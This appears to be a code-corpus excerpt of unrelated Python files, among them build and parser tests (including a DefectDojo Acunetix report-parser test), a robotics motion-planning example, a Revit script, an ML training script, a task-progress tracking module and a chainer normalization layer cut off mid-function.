bepress_provider = PreprintProvider.objects.get(_id='osf')
except PreprintProvider.DoesNotExist:
bepress_provider, _ = update_or_create(OSF_PROVIDER_DATA)
# Flat taxonomy is stored locally, read in here
with open(
os.path.join(
settings.APP_PATH,
'website', 'static', filename
)
) as fp:
taxonomy = json.load(fp)
for subject_path in taxonomy.get('data'):
subjects = subject_path.split('_')
text = subjects[-1]
# Search for parent subject, get id if it exists
parent = None
if len(subjects) > 1:
parent, created_p = Subject.objects.get_or_create(text=subjects[-2], provider=bepress_provider)
if created_p:
logger.info('Created parent "{}":{} for subject {}'.format(parent.text, parent._id, text))
logger.info(u'Getting or creating Subject "{}"{}'.format(
text,
u' with parent {}:{}'.format(parent.text, parent._id) if parent else ''
))
subject, _ = Subject.objects.get_or_create(text=text, provider=bepress_provider)
if parent and not subject.parent:
logger.info(u'Adding parent "{}":{} to Subject "{}":{}'.format(
parent.text, parent._id,
subject.text, subject._id
))
subject.parent = parent
subject.save()
def main():
init_app(set_backends=True, routes=False)
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
with transaction.atomic():
update_taxonomies('bepress_taxonomy.json')
if dry_run:
raise RuntimeError('Dry run, transaction rolled back')
if __name__ == '__main__':
main()
|
68359
|
import unittest
from collections import OrderedDict
from conans.model.ref import ConanFileReference
from conans.test.utils.tools import TestServer, TurboTestClient, GenConanfile
class InstallCascadeTest(unittest.TestCase):
def setUp(self):
"""
A
/ \
B C
| \
D |
/ \ |
| \ /
E F
"""
server = TestServer()
servers = OrderedDict([("default", server)])
self.client = TurboTestClient(servers=servers)
self.ref_a = ConanFileReference.loads("libA/1.0@conan/stable")
self.client.create(self.ref_a, conanfile=GenConanfile())
self.ref_b = ConanFileReference.loads("libB/1.0@conan/stable")
self.client.create(self.ref_b, conanfile=GenConanfile().with_requirement(self.ref_a))
self.ref_c = ConanFileReference.loads("libC/1.0@conan/stable")
self.client.create(self.ref_c, conanfile=GenConanfile().with_requirement(self.ref_a))
self.ref_d = ConanFileReference.loads("libD/1.0@conan/stable")
self.client.create(self.ref_d, conanfile=GenConanfile().with_requirement(self.ref_b))
self.ref_e = ConanFileReference.loads("libE/1.0@conan/stable")
self.client.create(self.ref_e, conanfile=GenConanfile().with_requirement(self.ref_d))
self.ref_f = ConanFileReference.loads("libF/1.0@conan/stable")
conanfile = GenConanfile().with_requirement(self.ref_c).with_requirement(self.ref_d)
self.client.create(self.ref_f, conanfile=conanfile)
def _assert_built(self, refs):
for ref in refs:
self.assertIn("{}: Copying sources to build folder".format(ref), self.client.out)
for ref in [self.ref_a, self.ref_b, self.ref_c, self.ref_d, self.ref_e, self.ref_f]:
if ref not in refs:
self.assertNotIn("{}: Copying sources to build folder".format(ref),
self.client.out)
def test_install_cascade_only_affected(self):
project = ConanFileReference.loads("project/1.0@conan/stable")
project_cf = GenConanfile().with_requirement(self.ref_e).with_requirement(self.ref_f)
# Building A everything is built
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_a))
self._assert_built([self.ref_a, self.ref_b, self.ref_c, self.ref_d,
self.ref_e, self.ref_f, project])
# Building D builds E, F and project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_d))
self._assert_built([self.ref_d, self.ref_e, self.ref_f, project])
# Building E only builds E and project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_e))
self._assert_built([self.ref_e, project])
# Building project only builds project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(project))
self._assert_built([project])
# Building C => builds F and project
self.client.create(project, conanfile=project_cf,
args="--build {} --build cascade".format(self.ref_c))
self._assert_built([project, self.ref_f, self.ref_c])
|
68495
|
import datetime
from ..dojo_test_case import DojoTestCase
from dojo.models import Test
from dojo.tools.acunetix.parser import AcunetixParser
class TestAcunetixParser(DojoTestCase):
def test_parse_file_with_one_finding(self):
testfile = open("unittests/scans/acunetix/one_finding.xml")
parser = AcunetixParser()
findings = parser.get_findings(testfile, Test())
for finding in findings:
for endpoint in finding.unsaved_endpoints:
endpoint.clean()
self.assertEqual(1, len(findings))
with self.subTest(i=0):
finding = findings[0]
self.assertEqual("Medium", finding.severity)
self.assertEqual(352, finding.cwe)
self.assertEqual(datetime.date(2018, 9, 24), finding.date)
self.assertIsNotNone(finding.description)
self.assertGreater(len(finding.description), 0)
self.assertFalse(finding.false_p)
self.assertEqual("Vijay Test Imapact", finding.impact)
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
self.assertEqual(1, len(finding.unsaved_endpoints))
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertEqual('https', endpoint.protocol)
self.assertEqual(443, endpoint.port)
self.assertEqual('vijaytest.com', endpoint.host)
self.assertEqual('some/path', endpoint.path)
def test_parse_file_with_multiple_finding(self):
testfile = open("unittests/scans/acunetix/many_findings.xml")
parser = AcunetixParser()
findings = parser.get_findings(testfile, Test())
for finding in findings:
for endpoint in finding.unsaved_endpoints:
endpoint.clean()
self.assertEqual(4, len(findings))
with self.subTest(i=0):
finding = findings[0]
self.assertEqual("Medium", finding.severity)
self.assertEqual(datetime.date(2020, 2, 27), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertEqual("A single machine can take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.", finding.impact)
            # check that this finding has references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('www.itsecgames.com', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
with self.subTest(i=1):
finding = findings[1]
self.assertEqual("Possible virtual host found", finding.title)
self.assertEqual("Low", finding.severity)
self.assertEqual(200, finding.cwe)
self.assertEqual(datetime.date(2020, 2, 27), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertEqual("Possible sensitive information disclosure.", finding.impact)
            # check that this finding has references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('www.itsecgames.com', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
with self.subTest(i=2):
finding = findings[2]
self.assertEqual("Unencrypted connection (verified)", finding.title)
self.assertEqual("Low", finding.severity)
self.assertEqual(310, finding.cwe)
self.assertEqual(datetime.date(2020, 2, 27), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertEqual("Possible information disclosure.", finding.impact)
            # check that this finding has no references
self.assertIsNone(finding.references)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('www.itsec<EMAIL>', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
def test_parse_file_with_example_com(self):
testfile = open("unittests/scans/acunetix/XML_http_example_co_id_.xml")
parser = AcunetixParser()
findings = parser.get_findings(testfile, Test())
for finding in findings:
for endpoint in finding.unsaved_endpoints:
endpoint.clean()
self.assertEqual(7, len(findings))
with self.subTest(i=0):
finding = findings[0]
self.assertEqual("HTML form without CSRF protection", finding.title)
self.assertEqual("Medium", finding.severity)
self.assertEqual(datetime.date(2020, 4, 28), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertIn("An attacker could use CSRF to trick a victim into accessing a website hosted by the attacker,", finding.impact)
# aggregated
self.assertEqual(3, finding.nb_occurences)
            # check that this finding has references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(3, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('example.co.id', endpoint.host)
self.assertEqual('h/search', endpoint.path)
endpoint = finding.unsaved_endpoints[1]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('example.co.id', endpoint.host)
self.assertEqual('m/zmain', endpoint.path)
# check req/resp
self.assertEqual(3, len(finding.unsaved_req_resp))
for req_resp in finding.unsaved_req_resp:
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
with self.subTest(i=6):
finding = findings[6]
self.assertEqual("Content Security Policy (CSP) not implemented", finding.title)
self.assertEqual("Info", finding.severity)
self.assertEqual(datetime.date(2020, 4, 28), finding.date)
self.assertIsNotNone(finding.description)
self.assertFalse(finding.false_p)
self.assertIn("CSP can be used to prevent and/or mitigate attacks that involve content/code injection,", finding.impact)
            # check that this finding has references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('example.co.id', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
|
68545
|
from compas_fab.backends import RosClient
from helpers import show_trajectory
from compas.geometry import Frame
with RosClient("localhost") as client:
robot = client.load_robot()
group = robot.main_group_name
frames = []
frames.append(Frame((0.3, 0.1, 0.05), (-1, 0, 0), (0, 1, 0)))
frames.append(Frame((0.4, 0.3, 0.05), (-1, 0, 0), (0, 1, 0)))
start_configuration = robot.zero_configuration()
start_configuration.joint_values = (-0.106, 5.351, 2.231, -2.869, 4.712, 1.465)
trajectory = robot.plan_cartesian_motion(frames,
start_configuration,
group=group,
options=dict(
max_step=0.01,
avoid_collisions=True,
))
print("Computed cartesian path with %d configurations, " % len(trajectory.points))
print("following %d%% of requested trajectory." % (trajectory.fraction * 100))
print("Executing this path at full speed would take approx. %.3f seconds." % trajectory.time_from_start)
show_trajectory(trajectory)
|
68608
|
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
refgroup = UnwrapElement(IN[0])
groups = UnwrapElement(IN[1])
# Get Mirrored state of first family instance in reference group instance
refGroupMembers = refgroup.GetMemberIds()
numMembers = len(refGroupMembers)
counter = 0
membernum = None
refGroupType = refgroup.GroupType.Id.IntegerValue
for member in refGroupMembers:
elem = refgroup.Document.GetElement(member)
if elem.GetType().ToString() == "Autodesk.Revit.DB.FamilyInstance":
state = elem.Mirrored
membernum = counter
famtype = elem.GetTypeId().IntegerValue
break
counter += 1
# Default values for flags
refGroupIntact = True
noFamInsts = False
# Set a flag if the reference group contains no family instances
if membernum is None: noFamInsts = True
else:
bools = []
# Compare Mirrored state with corresponding members of other group instances
for group in groups:
# Get number of group members
theseMembers = group.GetMemberIds()
theseMembersNum = len(theseMembers)
# Set a flag if any group instance has more members than the reference group instance
# (only if both are of the same group type)
if theseMembersNum > numMembers and refGroupType == group.GroupType.Id.IntegerValue:
refGroupIntact = False
break
# Return null if group is of another group type
elif refGroupType != group.GroupType.Id.IntegerValue: bools.append(None)
# Return null for group instances with excluded members
elif theseMembersNum < numMembers: bools.append(None)
        # Return null if the family instance to compare is of a different type
elif group.Document.GetElement(theseMembers[membernum]).GetTypeId().IntegerValue != famtype: bools.append(None)
# Otherwise compare Mirrored state
else: bools.append(group.Document.GetElement(theseMembers[membernum]).Mirrored != state)
# Return null for all groups if the first group has excluded members
# or if it does not contain any family instances
if not refGroupIntact or noFamInsts: bools = [None] * len(groups)
OUT = bools
|
68643
|
import pytest
from ics import Calendar, ContentLine
def test_gh195_override_prodid():
lines = [
"BEGIN:VCALENDAR",
"VERSION:2.0",
"X-WR-CALNAME:<NAME>",
"X-APPLE-CALENDAR-COLOR:#996633",
"END:VCALENDAR"
]
with pytest.raises(ValueError, match="attribute PRODID is required but got no value"):
Calendar(lines)
calendar = Calendar()
assert calendar.prodid == Calendar.DEFAULT_PRODID
assert ContentLine("PRODID", value=Calendar.DEFAULT_PRODID) in calendar.to_container()
test_prodid = "TEST_PRODID 123456 GitHub Issue 195"
lines.insert(1, "PRODID:" + test_prodid)
calendar = Calendar(lines)
assert calendar.prodid == test_prodid
assert ContentLine("PRODID", value=test_prodid) in calendar.to_container()
|
68716
|
import jittor as jt
import numpy as np
from advance import *
import matplotlib.pyplot as plt
import argparse
from tqdm import trange
from utils import get_model, modelSet, dataset_choices
plt.switch_backend('agg')
# CUDA_VISIBLE_DEVICES=0 log_silent=1 python3.7 run_ssl.py --model deeplab --layer aspp --channel 256 --dataset pancreas --save checkpoints/deeplab-ssl.pkl -e 50 --lr 5e-6
if __name__ == '__main__':
jt.flags.use_cuda = int(1)
parser = argparse.ArgumentParser()
parser.add_argument('--model', default='unet', type=str, choices=modelSet, help='choose a model network')
parser.add_argument('--dataset', type=str, choices=dataset_choices, required=True, help='select a dataset')
parser.add_argument('--save', default='checkpoints/ssl.pkl', type=str, help='model weights save path')
parser.add_argument('-e', '--epochs', type=int, default=20, help='number of training epochs', dest='epochs')
parser.add_argument('-c', '--class-num', type=int, default=2, help='class number', dest='class_num')
parser.add_argument('-b', '--batch-size', type=int, default=8, help='training batch size', dest='batch_size')
parser.add_argument('--channel', dest='embedding_channel', type=int, default=512, help='number of channels of embedded feature maps')
parser.add_argument('--layer', type=str, default='down4', help='layer to extract features from')
parser.add_argument('--lr', type=float, default=1e-5, help='learning rate')
parser.add_argument('--pretrain', action='store_true')
args = parser.parse_args()
model = get_model(args)
train_loader = retrieve_aug_data(args, 'train', augmentation)
learner = MoCoLearner(
model=model,
layer=args.layer,
loader=train_loader,
embedding_channel=args.embedding_channel,
project_dim=128,
lr=args.lr
)
loss_min = 1e4
losses = []
with open('./log/ssl.txt', 'w') as f:
# bar = trange(args.epochs)
for epoch in range(args.epochs):
loss = learner.train()
# bar.set_description('epoch[%02d] loss:[%.6f\n]' % (epoch + 1, loss))
print('epoch[%02d] loss:[%.6f\n]' % (epoch + 1, loss))
f.write('epoch[%02d] loss:[%.6f\n]' % (epoch + 1, loss))
            if loss < loss_min:
                loss_min = loss
                model.save(args.save)
losses.append(loss)
            np.savetxt('./log/ssl_loss.txt', losses)
plt.plot(losses)
plt.savefig('./result/ssl_losses.png')
|
68731
|
import logging
import os
import re
import time
from threading import Event, Lock, Thread
import cook.util as cu
class ProgressSequenceCounter:
"""Utility class that supports atomically incrementing the sequence value."""
def __init__(self, initial=0):
self.lock = Lock()
self.value = initial
def increment_and_get(self):
"""Atomically increments by one the current value and returns the new value."""
with self.lock:
self.value += 1
return self.value
class ProgressUpdater(object):
"""This class is responsible for sending progress updates to the scheduler.
It throttles the rate at which progress updates are sent.
"""
def __init__(self, task_id, max_message_length, poll_interval_ms, send_progress_message_fn):
"""
task_id: string
The task id.
max_message_length: int
The allowed max message length after encoding.
poll_interval_ms: int
The interval after which to send a subsequent progress update.
send_progress_message_fn: function(message)
The helper function used to send the progress message.
"""
self.task_id = task_id
self.max_message_length = max_message_length
self.poll_interval_ms = poll_interval_ms
self.last_reported_time = None
self.last_progress_data_sent = None
self.send_progress_message = send_progress_message_fn
self.lock = Lock()
def has_enough_time_elapsed_since_last_update(self):
"""Returns true if enough time (based on poll_interval_ms) has elapsed since
the last progress update (available in last_reported_time).
"""
if self.last_reported_time is None:
return True
else:
current_time = time.time()
time_diff_ms = (current_time - self.last_reported_time) * 1000
return time_diff_ms >= self.poll_interval_ms
def is_increasing_sequence(self, progress_data):
"""Checks if the sequence number in progress_data is larger than the previously published progress.
Parameters
----------
progress_data: dictionary
The progress data to send.
Returns
-------
True if the sequence number in progress_data is larger than the previously published progress, False otherwise
"""
last_progress_data = self.last_progress_data_sent
last_progress_sequence = last_progress_data['progress-sequence'] if last_progress_data else -1
return progress_data['progress-sequence'] > last_progress_sequence
def send_progress_update(self, progress_data, force_send=False):
"""Sends a progress update if enough time has elapsed since the last progress update.
The force_send flag can be used to ignore the check for enough time having elapsed.
Using this method is thread-safe.
Parameters
----------
progress_data: dictionary
The progress data to send.
force_send: boolean, optional
Defaults to false.
Returns
-------
Nothing
"""
with self.lock:
# ensure we do not send outdated progress data due to parallel repeated calls to this method
if progress_data is None or not self.is_increasing_sequence(progress_data):
logging.info('Skipping invalid/outdated progress data {}'.format(progress_data))
elif not force_send and not self.has_enough_time_elapsed_since_last_update():
logging.debug('Not sending progress data as enough time has not elapsed since last update')
else:
logging.info('Sending progress message {}'.format(progress_data))
message_dict = dict(progress_data)
message_dict['task-id'] = self.task_id
raw_progress_message = progress_data['progress-message']
try:
progress_str = raw_progress_message.decode('ascii').strip()
except UnicodeDecodeError:
logging.info('Unable to decode progress message in ascii, using empty string instead')
progress_str = ''
if len(progress_str) <= self.max_message_length:
message_dict['progress-message'] = progress_str
else:
allowed_progress_message_length = max(self.max_message_length - 3, 0)
new_progress_str = progress_str[:allowed_progress_message_length].strip() + '...'
logging.info('Progress message trimmed to {}'.format(new_progress_str))
message_dict['progress-message'] = new_progress_str
send_success = self.send_progress_message(message_dict)
if send_success:
self.last_progress_data_sent = progress_data
self.last_reported_time = time.time()
else:
logging.info('Unable to send progress message {}'.format(message_dict))
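# Minimal usage sketch for ProgressUpdater (the task id and sender below are
# hypothetical, not part of this module):
#
#   def send_to_scheduler(message):
#       logging.info('would send %s', message)
#       return True
#
#   updater = ProgressUpdater('task-0', max_message_length=64, poll_interval_ms=1000,
#                             send_progress_message_fn=send_to_scheduler)
#   updater.send_progress_update({'progress-sequence': 1,
#                                 'progress-percent': 10,
#                                 'progress-message': b'step 1 done'})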
class ProgressWatcher(object):
"""This class tails the output from the target file listening for progress messages.
The retrieve_progress_states generates all progress messages iteratively.
"""
def __init__(self, output_name, location_tag, sequence_counter, max_bytes_read_per_line, progress_regex_string,
stop_signal, task_completed_signal, progress_termination_signal):
"""The ProgressWatcher constructor.
Parameters
----------
progress_regex_string: string
The progress regex to match against, it must return one or two capture groups.
The first capture group represents the progress percentage.
The second capture group, if present, represents the progress message.
"""
self.target_file = output_name
self.location_tag = location_tag
self.sequence_counter = sequence_counter
self.max_bytes_read_per_line = max_bytes_read_per_line
self.progress_regex_string = progress_regex_string
self.progress_regex_pattern = re.compile(progress_regex_string.encode())
self.progress = None
self.stop_signal = stop_signal
self.task_completed_signal = task_completed_signal
self.progress_termination_signal = progress_termination_signal
def current_progress(self):
"""Returns the current progress dictionary."""
return self.progress
def tail(self, sleep_time_ms):
"""This method incrementally generates lines from a file by waiting for new content from a file.
It behaves like the 'tail -f' shell command.
Parameters
----------
sleep_time_ms: int
The unit of time in ms to repetitively sleep when the file has not been created or no new
content is available in the file being tailed.
Returns
-------
an incrementally generated list of lines in the file being tailed.
"""
try:
sleep_param = sleep_time_ms / 1000
if os.path.exists(self.target_file) and not os.path.isfile(self.target_file):
logging.info('Skipping progress monitoring on %s as it is not a file', self.target_file)
return
if not os.path.isfile(self.target_file):
logging.debug('Awaiting creation of file %s [tag=%s]', self.target_file, self.location_tag)
while not os.path.isfile(self.target_file) and not self.task_completed_signal.isSet():
time.sleep(sleep_param)
if not os.path.isfile(self.target_file):
logging.info('Progress output file has not been created [tag=%s]', self.location_tag)
return
if self.stop_signal.isSet():
logging.info('Parsing progress messages interrupted [tag=%s]', self.location_tag)
return
logging.info('File has been created, reading contents [tag=%s]', self.location_tag)
linesep_bytes = os.linesep.encode()
fragment_index = 0
line_index = 0
def log_tail_summary():
log_message = '%s fragments and %s lines read while processing progress messages [tag=%s]'
logging.info(log_message, fragment_index, line_index, self.location_tag)
with open(self.target_file, 'rb') as target_file_obj:
while not self.stop_signal.isSet():
if self.progress_termination_signal.isSet():
logging.info('tail short-circuiting due to progress termination [tag=%s]', self.location_tag)
log_tail_summary()
break
line = target_file_obj.readline(self.max_bytes_read_per_line)
if not line:
# exit if program has completed and there are no more lines to read
if self.task_completed_signal.isSet():
log_tail_summary()
break
# no new line available, sleep before trying again
time.sleep(sleep_param)
continue
fragment_index += 1
if line.endswith(linesep_bytes):
line_index += 1
yield line
if self.stop_signal.isSet() and not self.task_completed_signal.isSet():
logging.info('Task requested to be killed, may not have processed all progress messages')
except Exception as exception:
logging.exception('Error while tailing %s [tag=%s]', self.target_file, self.location_tag)
raise exception
def match_progress_update(self, input_data):
"""Returns the progress tuple when the input string matches the provided regex.
Parameters
----------
input_data: bytes
The input data.
Returns
-------
the tuple (percent, message) if the string matches the provided regex,
else return None.
"""
matches = self.progress_regex_pattern.findall(input_data)
return matches[0] if len(matches) >= 1 else None
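    # Illustration (the regex and line below are hypothetical, not taken from the
    # executor config): with progress_regex_string = r'progress: (\d+\.?\d*) (.*)',
    # the input b'progress: 42.0 resampling data' yields the capture tuple
    # (b'42.0', b'resampling data'), which __update_progress converts into a
    # progress-percent of 42 plus the message bytes.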
def __update_progress(self, progress_report):
"""Updates the progress field with the data from progress_report if it is valid."""
if isinstance(progress_report, tuple) and len(progress_report) == 2:
percent_data, message_data = progress_report
elif isinstance(progress_report, tuple) and len(progress_report) == 1:
percent_data, message_data = progress_report[0], b''
else:
percent_data, message_data = progress_report, b''
percent_float = float(percent_data.decode())
if percent_float < 0 or percent_float > 100:
logging.info('Skipping "%s" as the percent is not in [0, 100]', progress_report)
return False
percent_int = int(round(percent_float))
logging.debug('Updating progress to %s percent [tag=%s]', percent_int, self.location_tag)
self.progress = {'progress-message': message_data,
'progress-percent': percent_int,
'progress-sequence': self.sequence_counter.increment_and_get()}
return True
def retrieve_progress_states(self):
"""Generates the progress states by tailing the target_file.
It tails a target file (using the tail() method) and uses the provided
regex to find a match for a progress message. The regex is expected to
generate two components in the match: the progress percent as an int and
a progress message string. When such a message is found, this method
yields the current progress as a dictionary.
Note: This function must rethrow any OSError exceptions that it encounters.
Returns
-------
An incrementally generated list of progress states.
"""
last_unprocessed_report = None
if self.progress_regex_string:
sleep_time_ms = 50
for line in self.tail(sleep_time_ms):
try:
progress_report = self.match_progress_update(line)
if progress_report is not None:
if self.task_completed_signal.isSet():
last_unprocessed_report = progress_report
elif self.__update_progress(progress_report):
yield self.progress
except Exception as exception:
if cu.is_out_of_memory_error(exception):
raise exception
else:
logging.exception('Skipping "%s" as a progress entry', line)
if last_unprocessed_report is not None:
if self.__update_progress(last_unprocessed_report):
yield self.progress
class ProgressTracker(object):
"""Helper class to track progress messages from the specified location."""
def __init__(self, config, stop_signal, task_completed_signal, counter, progress_updater,
progress_termination_signal, location, location_tag, os_error_handler):
"""Launches the threads that track progress and send progress updates to the driver.
Parameters
----------
config: cook.config.ExecutorConfig
The current executor config.
stop_signal: threading.Event
Event that determines if an interrupt was sent
task_completed_signal: threading.Event
Event that tracks task execution completion
progress_updater: ProgressUpdater
The progress updater used to send the progress messages
counter: ProgressSequenceCounter
The sequence counter
location: string
The target location to read for progress messages
location_tag: string
A tag to identify the target location.
os_error_handler: fn(os_error)
OSError exception handler for out of memory situations."""
self.location_tag = location_tag
self.os_error_handler = os_error_handler
self.progress_complete_event = Event()
self.watcher = ProgressWatcher(location, location_tag, counter, config.max_bytes_read_per_line,
config.progress_regex_string, stop_signal, task_completed_signal,
progress_termination_signal)
self.updater = progress_updater
def start(self):
"""Launches a thread that starts monitoring the progress location for progress messages."""
logging.info('Starting progress monitoring from [tag=%s]', self.location_tag)
tracker_thread = Thread(target=self.track_progress, args=())
tracker_thread.daemon = True
tracker_thread.start()
def wait(self, timeout=None):
"""Waits for the progress tracker thread to run to completion."""
self.progress_complete_event.wait(timeout=timeout)
if self.progress_complete_event.isSet():
logging.info('Progress monitoring complete [tag=%s]', self.location_tag)
else:
logging.info('Progress monitoring did not complete [tag=%s]', self.location_tag)
def track_progress(self):
"""Retrieves and sends progress updates using send_progress_update_fn.
It sets the progress_complete_event before returning."""
try:
for current_progress in self.watcher.retrieve_progress_states():
self.updater.send_progress_update(current_progress)
except Exception as exception:
if cu.is_out_of_memory_error(exception):
self.os_error_handler(exception)
else:
logging.exception('Exception while tracking progress [tag=%s]', self.location_tag)
finally:
self.progress_complete_event.set()
def force_send_progress_update(self):
"""Retrieves the latest progress message and attempts to force send it to the scheduler."""
latest_progress = self.watcher.current_progress()
self.updater.send_progress_update(latest_progress, force_send=True)
|
68794
|
import sys
import inspect
import threading
#import logging
class logging:
@staticmethod
def debug( msg ):
print( msg, file=sys.stderr)
def format_frame( frame ):
return '{}:{} {}'.format( *[str(getattr(frame, a)) for a in ('filename', 'lineno', 'function')] )
# Class to wrap Lock and simplify logging of lock usage
class Lock:
"""
Wraps a standard Lock, so that attempts to use the
lock according to its API are logged for debugging purposes
"""
def __init__(self, name=None, log=None):
self.lock = threading.Lock()
self.do_init( name, log )
self.log.debug("{0} created {1}".format(self.context(), self.name))
def do_init( self, name=None, log=None ):
self.name = str(name)
self.log = log or logging
def acquire(self, blocking=True):
self.log.debug("{0} ---- trying to acquire {1}".format( self.context(), self.name))
for f in self.print_stack():
self.log.debug( f )
ret = self.lock.acquire(blocking)
if ret == True:
self.log.debug("{0} **** acquired {1}".format(
self.context(), self.name))
else:
self.log.debug("{0} **** non-blocking acquire of {1} lock failed".format(
self.context(), self.name))
return ret
def print_stack( self ):
stack = inspect.stack()
return [format_frame(frame) for frame in reversed(stack)]
def context( self ):
return format_frame( inspect.stack()[3] )
def release(self):
self.log.debug("{0} vvvv releasing {1}".format(self.context(), self.name))
self.lock.release()
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
return False # Do not swallow exceptions
class RLock(Lock):
"""
Wraps a standard RLock, so that attempts to use the
lock according to its API are logged for debugging purposes
"""
def __init__(self, name=None, log=None):
self.lock = threading.RLock()
self.do_init( name, log )
self.log.debug("{0} created {1}".format(self.context(), self.name))
|
68800
|
import numpy
import six
from chainer.backends import cuda
from chainer.backends import intel64
from chainer import function_node
from chainer.utils import type_check
def _cu_conv_sum(y, x, n):
# Convolutional sum
# TODO(beam2d): Use scan computation
rdim = x.size // (x.shape[0] * x.shape[1])
cuda.elementwise(
'raw T x, int32 rdim, int32 N, int32 n_', 'raw T y',
'''
int half_n = n_ / 2;
int offset = i / rdim * N * rdim + i % rdim;
float sum_part = 0;
for (int j = 0; j < N + half_n; ++j) {
if (j < N) {
sum_part += x[offset + j * rdim];
}
if (j >= n_) {
sum_part -= x[offset + (j - n_) * rdim];
}
if (j >= half_n) {
y[offset + (j - half_n) * rdim] = sum_part;
}
}
''', 'lrn_conv_sum')(x, rdim, x.shape[1], n, y,
size=x.shape[0] * rdim)
class LocalResponseNormalization(function_node.FunctionNode):
"""Cross-channel normalization function used in AlexNet."""
_use_ideep = False
def __init__(self, n=5, k=2, alpha=1e-4, beta=.75):
self.n = n
self.k = k
self.alpha = alpha
self.beta = beta
self.scale = None
self.indexes = None
self.unit_scale = None
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x_type, = in_types
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim >= 2,
)
def forward_cpu(self, inputs):
if (intel64.should_use_ideep('>=auto')
and intel64.inputs_all_ready(inputs, (4,))):
self._use_ideep = True
return self.forward_ideep(inputs)
x, = inputs
self.retain_inputs((0,))
self.retain_outputs((0,))
half_n = self.n // 2
x2 = numpy.square(x)
sum_part = x2.copy()
for i in six.moves.range(1, half_n + 1):
sum_part[:, i:] += x2[:, :-i]
sum_part[:, :-i] += x2[:, i:]
self.unit_scale = self.k + self.alpha * sum_part
self.scale = self.unit_scale ** -self.beta
y = x * self.scale
return y,
def forward_ideep(self, inputs):
x, = inputs
self.retain_inputs((0,))
self.retain_outputs((0,))
param = intel64.ideep.localResponseNormalizationParam(
self.n, self.k, self.n * self.alpha, self.beta,
